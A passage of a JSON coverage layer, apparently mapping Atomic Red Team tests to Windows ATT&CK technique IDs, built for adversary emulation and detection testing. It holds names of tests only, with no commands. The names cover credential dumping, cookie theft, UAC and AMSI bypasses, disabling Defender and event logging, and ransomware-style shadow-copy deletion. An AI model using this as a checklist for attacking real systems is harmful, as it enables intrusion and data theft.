Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies 
(Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
